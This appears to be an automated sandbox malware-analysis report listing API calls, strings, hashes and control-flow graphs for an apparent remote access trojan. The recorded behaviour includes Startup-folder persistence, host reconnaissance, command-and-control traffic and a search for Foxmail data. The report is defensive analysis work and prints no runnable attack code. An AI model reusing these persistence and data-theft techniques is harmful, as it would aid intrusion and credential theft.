                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1083526818-0
                                                                                                                                                                                                                              • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                              • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                              • String ID: hHgF$pth_unenc$BG
                                                                                                                                                                                                                              • API String ID: 2281282204-2498983548
                                                                                                                                                                                                                              • Opcode ID: 96f855e70242bb7aa32fe4833ee5ea59a66a7e4798cfecf5ed6862be313f6a2c
                                                                                                                                                                                                                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96f855e70242bb7aa32fe4833ee5ea59a66a7e4798cfecf5ed6862be313f6a2c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?), ref: 0040456A
                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,0040460E,00000000,?), ref: 00404588
                                                                                                                                                                                                                              • recv.WS2_32(?,00000000,00000000,00000000), ref: 0040459F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EventObjectSingleWaitrecv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 311754179-0
                                                                                                                                                                                                                              • Opcode ID: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                                                                                                                                                                                              • Instruction ID: 26c9fa113e50de76ad78d978a7fe27ea9b76c3f20528cd6e12f8aa4c3c3b2b63
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF08236108212BFD7018B14FC08E1AFBA2FB88721F10863AF614522A19771EC20DB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetComputerNameExW.KERNEL32(00000001,?,?,00474358), ref: 0041A7BF
                                                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 0041A7D7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Name$ComputerUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4229901323-0
                                                                                                                                                                                                                              • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                                                                                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,0046673C), ref: 0040E68D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                              • Opcode ID: 8f670c9bc9cf5537f4d47deeb1742176d0e9de48ba061163cdb10aa1aaaa222a
                                                                                                                                                                                                                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f670c9bc9cf5537f4d47deeb1742176d0e9de48ba061163cdb10aa1aaaa222a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c 16 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 0->16 17 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 0->17 63 40d950-40d96b call 401d64 call 40b125 16->63 64 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 16->64 43 40dc96-40dca7 call 401eea 17->43 74 40d9a5-40d9ac call 40bed7 63->74 75 40d96d-40d98c call 401e8f call 4124b7 63->75 64->63 96 40e134-40e154 call 401e8f call 412902 call 4112b5 64->96 84 40d9b5-40d9bc 74->84 85 40d9ae-40d9b0 74->85 75->74 92 40d98e-40d9a4 call 401e8f call 412902 75->92 89 40d9c0-40d9cc call 41a463 84->89 90 40d9be 84->90 88 40dc95 85->88 88->43 97 40d9d5-40d9d9 89->97 98 40d9ce-40d9d0 89->98 90->89 92->74 102 40da18-40da2b call 401d64 call 401e8f 97->102 103 40d9db-40d9e2 call 40697b 97->103 98->97 121 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 102->121 122 40da2d call 4069ba 102->122 115 40d9e4-40d9e9 call 40699d call 4064d0 103->115 116 40d9ee-40da01 call 401d64 call 401e8f 103->116 115->116 116->102 132 40da03-40da09 116->132 157 40db22-40db26 121->157 158 40dabc-40dad5 call 401d64 call 401e8f 121->158 122->121 132->102 134 40da0b-40da11 132->134 134->102 136 40da13 call 4064d0 134->136 136->102 160 40dcaa-40dd01 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 157->160 161 40db2c-40db33 157->161 158->157 182 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 158->182 211 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f 160->211 163 40dbb1-40dbbb call 4082d7 161->163 164 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 161->164 171 40dbc0-40dbe4 call 4022f8 163->171 164->171 189 40dbf3 171->189 190 40dbe6-40dbf1 171->190 182->157 192 40dbf5-40dc40 call 401e07 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 189->192 190->192 248 40dc45-40dc6a call 401d64 call 40b125 192->248 260 40dd79-40dd7b 211->260 261 40dd5e 211->261 248->211 259 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 248->259 259->211 279 40dc93 259->279 264 40dd81 260->264 265 40dd7d-40dd7f 260->265 262 40dd60-40dd77 call 41beb0 261->262 268 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 262->268 264->268 265->262 317 40dea1 268->317 318 40de68-40de9f call 401d64 call 401e8f 268->318 279->88 319 40dea3-40debb call 401d64 call 401e8f 317->319 318->319 328 40def9-40df0c call 401d64 call 401e8f 319->328 329 40debd-40def4 call 401d64 call 401e8f 319->329 339 40df6c-40df7f call 401d64 call 401e8f 328->339 340 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 328->340 329->328 353 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 40b95c 339->353 354 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 339->354 340->339 353->354 373 40dfe0-40dfe1 SetProcessDEPPolicy 354->373 374 40dfe3-40dff6 CreateThread 354->374 373->374 377 40e004-40e00b 374->377 378 40dff8-40e001 374->378 381 40e019-40e020 377->381 382 40e00d-40e016 377->382 378->377 385 40e022-40e025 381->385 386 40e033-40e038 381->386 382->381 389 40e073-40e08e call 401e8f call 41246e 385->389 390 40e027-40e031 385->390 391 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 386->391 400 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 389->400 401 40e12a-40e12f call 40cbac call 413fd4 389->401 390->391 391->389 420 40e0ed-40e0f2 400->420 401->96 422 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 420->422 423 40e0d6-40e0d9 420->423 422->401 423->422 425 40e0db-40e0e8 Sleep call 401e07 423->425 425->420
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(0046BE5C,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe,00000104), ref: 0040D790
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileLibraryLoadModuleName
                                                                                                                                                                                                                              • String ID: ,fF$0DG$@CG$@CG$Access Level: $C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe$Exe$Rmc-R1T905$Software\$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$exepath$BG$BG$BG$BG$BG
                                                                                                                                                                                                                              • API String ID: 1159719554-3326415167
                                                                                                                                                                                                                              • Opcode ID: a463d707011176246d062938b8ab3f608eeb1094e5ecfbb9cbc5051350978a3b
                                                                                                                                                                                                                              • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a463d707011176246d062938b8ab3f608eeb1094e5ecfbb9cbc5051350978a3b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 435 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f 447 414021-414028 Sleep 435->447 448 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 435->448 447->448 463 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 448->463 464 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 448->464 517 41419a-4141a1 463->517 518 41418c-414198 463->518 464->463 519 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 517->519 518->519 546 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 519->546 547 41428f-41429d call 4041f1 519->547 568 414b54-414b66 call 4047eb call 4020b4 546->568 552 4142ca-4142df call 404915 call 40428c 547->552 553 41429f-4142c5 call 401f66 * 2 call 41a686 547->553 567 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 552->567 552->568 553->568 632 414434-414441 call 40541d 567->632 633 414446-41446d call 401e8f call 412513 567->633 583 414b68-414b88 call 401d64 call 401e8f Sleep 568->583 584 414b8e-414b96 call 401d8c 568->584 583->584 584->463 632->633 639 414474-414abb call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 633->639 640 41446f-414471 633->640 885 414ac0-414ac7 639->885 640->639 886 414ac9-414ad0 885->886 887 414adb-414ae2 885->887 886->887 888 414ad2-414ad4 886->888 889 414ae4-414ae9 call 40a767 887->889 890 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 887->890 888->887 889->890 901 414b22-414b2e CreateThread 890->901 902 414b34-414b4f call 401eea * 2 call 401e13 890->902 901->902 902->568
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000000), ref: 00414028
                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00414B88
                                                                                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                                                              • String ID: @CG$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe$Connected | $Connecting | $Connection Error: $Exe$Rmc-R1T905$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$>G$>G$BG
                                                                                                                                                                                                                              • API String ID: 524882891-4238267586
                                                                                                                                                                                                                              • Opcode ID: db3ecc2a8c1cc5224d90bec55e19ad124bed39eae9f05f85ce46655dfdd4523f
                                                                                                                                                                                                                              • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db3ecc2a8c1cc5224d90bec55e19ad124bed39eae9f05f85ce46655dfdd4523f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                                • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                                • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                                • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                                • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                              • API String ID: 672098462-2938083778
                                                                                                                                                                                                                              • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                              • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                                                                                                                                              • Opcode ID: ee8aea76cb97e82079f280d171b9f59c1dee7362194e25c4dfe561fcfffaf7e1
                                                                                                                                                                                                                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee8aea76cb97e82079f280d171b9f59c1dee7362194e25c4dfe561fcfffaf7e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1096 411c81-411cca GetModuleFileNameW call 401faa * 3 1103 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 1096->1103 1128 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1103->1128 1151 411df8 1128->1151 1152 411dea-411df2 1128->1152 1153 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1151->1153 1152->1128 1152->1151 1177 411e9a 1153->1177 1178 411e8c-411e94 1153->1178 1179 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1177->1179 1178->1153 1178->1177 1203 411f3c-411f60 1179->1203 1204 411f2e-411f36 1179->1204 1205 411f64-411f80 call 401e07 call 41b61a 1203->1205 1204->1179 1204->1203 1211 411f82-411f91 call 401e07 DeleteFileW 1205->1211 1212 411f97-411fb3 call 401e07 call 41b61a 1205->1212 1211->1212 1219 411fd0 1212->1219 1220 411fb5-411fce call 401e07 DeleteFileW 1212->1220 1222 411fd4-411ff0 call 401e07 call 41b61a 1219->1222 1220->1222 1228 411ff2-412004 call 401e07 DeleteFileW 1222->1228 1229 41200a-41200c 1222->1229 1228->1229 1230 412019-412024 Sleep 1229->1230 1231 41200e-412010 1229->1231 1230->1205 1235 41202a-41203c call 408339 1230->1235 1231->1230 1234 412012-412017 1231->1234 1234->1230 1234->1235 1238 412092-4120b1 call 401e13 * 3 1235->1238 1239 41203e-41204c call 408339 1235->1239 1250 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1238->1250 1239->1238 1245 41204e-41205c call 408339 1239->1245 1245->1238 1251 41205e-41208a call 401e13 * 3 1245->1251 1272 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1250->1272 1273 412274-41231b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 1250->1273 1251->1103 1268 412090 1251->1268 1268->1250 1342 41236f-4123cf call 401eea call 401e13 call 401eea * 7 1272->1342 1312 412320-41236b call 401eea * 7 1273->1312 1312->1342 1372 4123d4-4123f6 call 401eea * 2 1342->1372
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,00457288,00000000,?,?,?,?,00465900,0040C07B,004661E4), ref: 0041AB5F
                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                                                                                                                                                                                                              • String ID: HDG$HDG$>G$>G
                                                                                                                                                                                                                              • API String ID: 1351907930-1666402509
                                                                                                                                                                                                                              • Opcode ID: 42277b3b42eb109334dd24111a89349f796790d7aa6157c0bb389f63487bc69c
                                                                                                                                                                                                                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42277b3b42eb109334dd24111a89349f796790d7aa6157c0bb389f63487bc69c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
